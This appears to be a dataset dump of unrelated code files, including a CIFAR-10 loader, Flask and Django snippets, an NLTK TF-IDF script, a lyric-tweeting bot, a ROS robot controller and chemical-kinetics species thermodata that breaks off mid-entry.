text stringlengths 38 1.54M |
|---|
import os
import torchvision as tv
import numpy as np
from PIL import Image
def get_dataset(args, transform_train, transform_test):
if args.validation_exp == "True":
temp_dataset = Cifar10Train(args, train=True, transform=transform_train, download = args.download)
train_indexes, val_indexes = train_val_split(args, temp_dataset.train_labels)
cifar_train = Cifar10Train(args, train=True, transform=transform_train, sample_indexes = train_indexes)
testset = Cifar10Train(args, train=True, transform=transform_test, sample_indexes = val_indexes)
else:
cifar_train = Cifar10Train(args, train=True, transform=transform_train, download = args.download)
testset = tv.datasets.CIFAR10(root='./data', train=False, download=False, transform=transform_test)
return cifar_train, testset
def train_val_split(args, train_val):
np.random.seed(args.seed_dataset)
train_val = np.array(train_val)
train_indexes = []
val_indexes = []
val_num = int(args.val_samples / args.num_classes)
for id in range(args.num_classes):
indexes = np.where(train_val == id)[0]
np.random.shuffle(indexes)
val_indexes.extend(indexes[:val_num])
train_indexes.extend(indexes[val_num:])
np.random.shuffle(train_indexes)
np.random.shuffle(val_indexes)
return train_indexes, val_indexes
class Cifar10Train(tv.datasets.CIFAR10):
def __init__(self, args, train=True, transform=None, target_transform=None, sample_indexes = None, download=False):
super(Cifar10Train, self).__init__(args.train_root, train=train, transform=transform, target_transform=target_transform, download=download)
self.root = os.path.expanduser(args.train_root)
self.transform = transform
self.target_transform = target_transform
self.args = args
if sample_indexes is not None:
self.train_data = self.train_data[sample_indexes]
self.train_labels = np.array(self.train_labels)[sample_indexes]
self.num_classes = self.args.num_classes
self.data = self.train_data
self.labels = np.asarray(self.train_labels, dtype=np.long)
self.train_samples_idx = []
self.train_probs = np.ones(len(self.labels))*(-1)
self.avg_probs = np.ones(len(self.labels))*(-1)
self.times_seen = np.ones(len(self.labels))*1e-6
def __getitem__(self, index):
img, labels = self.data[index], self.labels[index]
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
labels = self.target_transform(labels)
return img, labels, index |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate, MigrateCommand
from ChordMe.config import Config
db = SQLAlchemy()
migrate = Migrate()
bcrypt = Bcrypt()
jwt = JWTManager()
def create_app(config_class=Config):
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
migrate.init_app(app, db)
bcrypt.init_app(app)
jwt.init_app(app)
from ChordMe.user.routes import user
app.register_blueprint(user)
from ChordMe.auth.routes import auth
app.register_blueprint(auth)
CORS(app)
# from ChordMe.error.handlers import error
# from ChordMe.service.routes import routes
return app
|
# date -> day, month, year
year, month, day = input().split(".")
print("%02d-%02d-%04d" %(int(day), int(month), int(year))) |
import nltk
import numpy as np
from nltk.corpus import stopwords
from nltk.corpus import PlaintextCorpusReader
# nltk.download('punkt')
# tokenizers/punkt/english.pickle
from nltk.tokenize import RegexpTokenizer
from string import punctuation
from nltk.corpus import stopwords
from nltk import word_tokenize
tokenizer = RegexpTokenizer(r'\w+')
corpus_root = '../data/abstract_50_90'
corpus = PlaintextCorpusReader(corpus_root,fileids='[0-9]+')
stop_words = stopwords.words() + list(punctuation) + ['None','Non']
def tokenize(text):
words = word_tokenize(text)
words = [w.lower() for w in words]
return [w for w in words if w not in stop_words and not w.isdigit()]
vocabulary = set()
for file_id in corpus.fileids():
words = tokenize(corpus.raw(file_id))
vocabulary.update(words)
vocabulary = list(vocabulary)
# word_index = {w: idx for idx, w in enumerate(vocabulary)}
# VOCABULARY_SIZE = len(vocabulary)
# DOCUMENTS_COUNT = len(corpus.fileids())
# word_idf = defaultdict(lambda: 0)
# for file_id in corpus.fileids():
# words = set(tokenize(corpus.raw(file_id)))
# for word in words:
# word_idf[word] += 1
# for word in vocabulary:
# word_idf[word] = math.log(DOCUMENTS_COUNT / float(1 + word_idf[word]))
# print(word_idf['mrsa'])
# print(word_idf['antibiotic'])
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf = TfidfVectorizer(stop_words=stop_words, tokenizer=tokenize, vocabulary=vocabulary)
# Fit the TfIdf model
tfidf_mat = tfidf.fit_transform([corpus.raw(file_id) for file_id in corpus.fileids()])
np.savetxt('tfidf_50_90',tfidf_mat,delimiter=',',fmt='%1.4e')
|
# -*- encoding: utf-8 -*-
"""
Formularios
===========
Módulo donde se especifícan los distintos formularios utilizados en la
administración de B{L{Home<IS2_R09.apps.home>}}.
"""
from django import forms
from django.contrib.auth.models import User
class login_form(forms.Form):
"""
Login
=====
Formulario destinado para la página de login del sistema.
@cvar username: Campo donde el usuario especifíca su User Name al momento de logearse al sistema.
@type username: CharField
@cvar password: Campo donde el usuario especifíca su contraseña al momento de logearse al sistema.
@type password: CharField
"""
username= forms.CharField(widget=forms.TextInput())
password= forms.CharField(widget=forms.PasswordInput(render_value=False))
class recuperar_contra(forms.Form):
"""
Recuperación de contraseña
==========================
Formulario destinado para la página de recuperción de contraseña del sistema.
@cvar email: Campo donde el usuario especifíca su email solicitando la recuperación de contraseña.
@type email: EmailField
"""
email = forms.EmailField(label= "Email", widget= forms.TextInput())
def clean_email(self):
mail = self.cleaned_data['email']
try:
u = User.objects.get(email=mail)
except User.DoesNotExist:
raise forms.ValidationError('Email no registrado! Por favor ingrese un email correcto')
return mail |
import logging
from datetime import datetime
import newrelic.agent
from util import cfg
newrelic.agent.global_settings().license_key = cfg.NEW_RELIC_KEY
# newrelic.agent.initialize(config_file="newrelic.ini", environment="production", log_file="stderr", log_level=logging.DEBUG)
from loguru import logger
import random
import genius_service
import twitter_service
import spotify_client
@newrelic.agent.background_task()
def handler(event, context):
# Init all api clients
spotibot = spotify_client.SpotifyService()
geniusbot = genius_service.GeniusClient()
twitterbot = twitter_service.TwitterClient()
# Get all songs for artist (defined in cfg)
songs = spotibot.get_all_artist_songs()
# Choose random song to get lyrics for
random.seed(datetime.now().timestamp())
# Shuffle array a couple of times before getting a random song
for i in range(random.randint(1, 120)):
random.shuffle(songs)
random_song = random.choice(songs)
# Get lyrics for random song
lyrics = geniusbot.get_lyrics(random_song.track_name, random_song.artist)
# Get random pair of lyrics from song
lyric_index = random.randint(0, len(lyrics) - 2)
lyric1 = lyrics[lyric_index]
lyric2 = lyrics[lyric_index + 1]
tweet_lyrics = f"{lyric1}\n{lyric2}"
logger.debug(f"Extracted 2 random lyrics")
# Actually tweet Lyrics
status = False
retry_limit = 0
# Try to send tweet x times before ultimately failing
logger.debug(f"Tweeting lyrics")
while not status and retry_limit < 2:
status = twitterbot.tweet(tweet_lyrics)
retry_limit += 1
retry_limit = 0
if __name__ == '__main__':
app = newrelic.agent.register_application(timeout=10.0)
with newrelic.agent.BackgroundTask(app, name="handler"):
handler(None, None)
|
import wikinetwork
import os
def test_ral():
os.chdir('.')
lines = ["raspberrypi\twatermelon\n" for i in range(5)]
with open('temp.txt', 'w') as temp:
for line in lines:
temp.write(line)
result = wikinetwork.read_article_links('temp.txt')
assert len(result) == len(lines)
for line in result:
assert line == ('raspberrypi', 'watermelon')
os.remove('temp.txt')
tests = [test_ral]
for test in tests:
print("starting {}".format(test.__name__))
test()
print("Done testing!!!!!!!!!!!!!!")
|
#!/usr/bin/env python
import roslib
import sys
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import math
from time import time
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Image
class robot_control:
def __init__(self):
self.move_pub = rospy.Publisher('/komodo_1/diff_driver/command', Twist, queue_size = 1)
rospy.init_node('talker')
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/komodo_1/Asus_Camera/rgb/image_raw",Image,self.callback)
rospy.Subscriber('/komodo_1/scan', LaserScan, self.check_distance)
self.red_lintel_found = False
self.current_distance = 30.0
self.length1 = 0.0
self.length2 = 0.0
self.colorCounter = 0
self.sawGreen = False
self.sawRed = False
self.sawBlue = False
self.msg = Twist()
def stop(self):
self.msg.linear.x = 0.0
self.msg.angular.z = 0.0
self.move_pub.publish(self.msg)
rospy.sleep(1.0)
def calculate_forward_angle(self):
if(self.colorCounter == 1):
return -0.1
if(self.colorCounter == 2):
return -0.01
if(self.colorCounter == 3):
return 0.04
def move_forward(self):
self.msg.linear.x = 1.0
self.msg.angular.z = self.calculate_forward_angle()
self.move_pub.publish(self.msg)
while(self.current_distance > 3.0):
self.msg.linear.x = 1.0
self.stop()
if self.colorCounter == 1:
self.msg.angular.z = 0.75
if self.colorCounter == 2:
self.msg.angular.z = -0.25
if self.colorCounter == 3:
self.msg.angular.z = -0.75
self.msg.linear.x = 1.0
self.move_pub.publish(self.msg)
if self.colorCounter == 3:
rospy.sleep(1.0)
print "last change"
self.msg.angular.z = 0.22
self.move_pub.publish(self.msg)
if self.colorCounter == 1:
rospy.sleep(1.0)
print "last change"
self.msg.angular.z = -0.5
self.move_pub.publish(self.msg)
def moveRobot(self):
while not self.red_lintel_found:
self.msg.angular.z = -2.0
self.move_pub.publish(self.msg)
rospy.sleep(0.3)
self.stop()
print "after first while"
self.move_forward()
def callback(self,data):
try:
cv_image = self.bridge.imgmsg_to_cv2(data, "bgr8")
except CvBridgeError as e:
print(e)
(rows,cols,channels) = cv_image.shape
red = False
blue = False
green = False
for x in range((rows/2)-20, (rows/2)+20):
for y in range((cols/2)-20, (cols/2)+20):
if(cv_image[x,y,0] <= 5 and cv_image[x,y,1] <= 5 and cv_image[x,y,2] >= 100):
red = True
if(self.sawRed == False):
self.colorCounter = self.colorCounter + 1
self.sawRed = True
break
if(cv_image[x,y,0] >= 100 and cv_image[x,y,1] <= 5 and cv_image[x,y,2] <= 5):
blue = True
if(self.sawBlue == False):
self.colorCounter = self.colorCounter + 1
self.sawBlue = True
break
if(cv_image[x,y,0] <= 5 and cv_image[x,y,1] >= 100 and cv_image[x,y,2] <= 5):
green = True
if(self.sawGreen == False):
self.colorCounter = self.colorCounter + 1
self.sawGreen = True
break
#print str(cv_image[x,y,0]) + " " + str(cv_image[x,y,1]) + " " + str(cv_image[x,y,2])
if(green):
print "green!"
if(red):
self.red_lintel_found = True
print "red!"
if(blue):
print "blue!"
def check_distance(self, laser_data):
laser_rays_count = len(laser_data.ranges)
middle_ray = laser_rays_count / 2
self.current_distance = laser_data.ranges[middle_ray]
print "The distance is: %0.1f" % self.current_distance
def main(args):
# Movement
rc = robot_control()
rc.moveRobot()
if __name__ == '__main__':
main(sys.argv)
|
species(
label = 'C=[C]C(C)C([O])CC(20840)',
structure = SMILES('C=[C]C(C)C([O])CC'),
E0 = (199.898,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2950,3100,1380,975,1025,1650,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0847516,0.0823914,-6.03071e-05,2.30583e-08,-3.61875e-12,24195.1,33.8741], Tmin=(100,'K'), Tmax=(1480.44,'K')), NASAPolynomial(coeffs=[16.4224,0.0377904,-1.51166e-05,2.70819e-09,-1.82243e-13,19307.6,-52.2398], Tmin=(1480.44,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(199.898,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(Cds_S)"""),
)
species(
label = 'C2H5CHO(70)',
structure = SMILES('CCC=O'),
E0 = (-204.33,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2782.5,750,1395,475,1775,1000],'cm^-1')),
HinderedRotor(inertia=(0.207559,'amu*angstrom^2'), symmetry=1, barrier=(4.77219,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.208362,'amu*angstrom^2'), symmetry=1, barrier=(4.79065,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3133.67,'J/mol'), sigma=(5.35118,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=489.47 K, Pc=46.4 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.90578,0.0240644,-7.06356e-06,-9.81837e-10,5.55825e-13,-24535.9,13.5806], Tmin=(100,'K'), Tmax=(1712.49,'K')), NASAPolynomial(coeffs=[7.69109,0.0189242,-7.84934e-06,1.38273e-09,-8.99057e-14,-27060.1,-14.6647], Tmin=(1712.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-204.33,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""propanal""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'CH3CHCCH2(18175)',
structure = SMILES('C=C=CC'),
E0 = (145.615,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,540,610,2055,2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(0.759584,'amu*angstrom^2'), symmetry=1, barrier=(17.4643,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (54.0904,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2996.71,'J/mol'), sigma=(5.18551,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=468.08 K, Pc=48.77 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.74635,0.0218189,8.22353e-06,-2.14768e-08,8.55624e-12,17563.6,12.7381], Tmin=(100,'K'), Tmax=(1025.6,'K')), NASAPolynomial(coeffs=[6.82078,0.0192338,-7.45622e-06,1.36536e-09,-9.53195e-14,16028,-10.4333], Tmin=(1025.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(145.615,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(228.648,'J/(mol*K)'), label="""CH3CHCCH2""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25472.7,-0.459566], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'C=C=C(C)C([O])CC(24948)',
structure = SMILES('C=C=C(C)C([O])CC'),
E0 = (118.776,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,350,440,435,1725,2750,2850,1437.5,1250,1305,750,350,254.124,254.125,254.125],'cm^-1')),
HinderedRotor(inertia=(0.0026104,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313431,'amu*angstrom^2'), symmetry=1, barrier=(14.3638,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313435,'amu*angstrom^2'), symmetry=1, barrier=(14.3637,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.313431,'amu*angstrom^2'), symmetry=1, barrier=(14.3638,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0605936,0.0816707,-6.22408e-05,2.44562e-08,-3.91001e-12,14437.7,31.5962], Tmin=(100,'K'), Tmax=(1465.11,'K')), NASAPolynomial(coeffs=[17.1556,0.0346674,-1.41181e-05,2.55897e-09,-1.73554e-13,9392.99,-58.0374], Tmin=(1465.11,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(118.776,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(440.667,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C]C(C)C(=O)CC(24949)',
structure = SMILES('C=[C]C(C)C(=O)CC'),
E0 = (27.5574,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,375,552.5,462.5,1710,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.214577,0.0905039,-0.000112418,9.35951e-08,-3.3297e-11,3443.76,30.5337], Tmin=(100,'K'), Tmax=(777.38,'K')), NASAPolynomial(coeffs=[5.85739,0.0532382,-2.46298e-05,4.68995e-09,-3.25708e-13,2815.14,6.33103], Tmin=(777.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(27.5574,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S)"""),
)
species(
label = 'C#CC(C)C([O])CC(24950)',
structure = SMILES('C#CC(C)C([O])CC'),
E0 = (127.006,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,750,770,3400,2100,2175,525,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (111.162,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.228102,0.0833961,-6.75518e-05,2.94075e-08,-5.19695e-12,15435.5,31.7213], Tmin=(100,'K'), Tmax=(1349.79,'K')), NASAPolynomial(coeffs=[16.5668,0.0336253,-1.2242e-05,2.08959e-09,-1.37274e-13,10901.6,-54.3421], Tmin=(1349.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(127.006,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CtCsCsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(CC(C)OJ)"""),
)
species(
label = 'CC[CH][O](563)',
structure = SMILES('CC[CH][O]'),
E0 = (133.127,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,298.357,1774.23],'cm^-1')),
HinderedRotor(inertia=(0.129074,'amu*angstrom^2'), symmetry=1, barrier=(8.14273,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00364816,'amu*angstrom^2'), symmetry=1, barrier=(8.14268,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (58.0791,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.1585,0.0245341,-8.42945e-06,1.83944e-10,2.32791e-13,16036.2,14.3859], Tmin=(100,'K'), Tmax=(2077.96,'K')), NASAPolynomial(coeffs=[11.8474,0.0146996,-6.30487e-06,1.09829e-09,-6.9226e-14,10937.4,-37.4679], Tmin=(2077.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(133.127,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(CCOJ) + radical(CCsJOH)"""),
)
species(
label = 'CH3(17)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C=C=CC([O])CC(24951)',
structure = SMILES('C=C=CC([O])CC'),
E0 = (157.831,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,355.088,355.097,355.133],'cm^-1')),
HinderedRotor(inertia=(0.159329,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.159216,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.159243,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (97.1351,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.698001,0.0627288,-3.57609e-05,3.33546e-09,2.62597e-12,19109.9,28.114], Tmin=(100,'K'), Tmax=(1102.74,'K')), NASAPolynomial(coeffs=[14.6076,0.0286101,-1.15718e-05,2.14571e-09,-1.49866e-13,15048.9,-44.8557], Tmin=(1102.74,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(157.831,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(369.994,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C][CH]C(18176)',
structure = SMILES('[CH2][C]=CC'),
E0 = (361.056,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(0.352622,'amu*angstrom^2'), symmetry=1, barrier=(8.10748,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.828631,'amu*angstrom^2'), symmetry=1, barrier=(19.0519,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (54.0904,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.42015,0.030446,-1.69076e-05,4.64684e-09,-5.12013e-13,43485.7,14.8304], Tmin=(100,'K'), Tmax=(2065.83,'K')), NASAPolynomial(coeffs=[10.7464,0.014324,-5.20136e-06,8.69079e-10,-5.48385e-14,40045.6,-31.3799], Tmin=(2065.83,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(361.056,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(Cds_S) + radical(Allyl_P)"""),
)
species(
label = 'C2H5(29)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.6,1642.82,1642.96,3622.23,3622.39],'cm^-1')),
HinderedRotor(inertia=(0.866817,'amu*angstrom^2'), symmetry=1, barrier=(19.9298,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
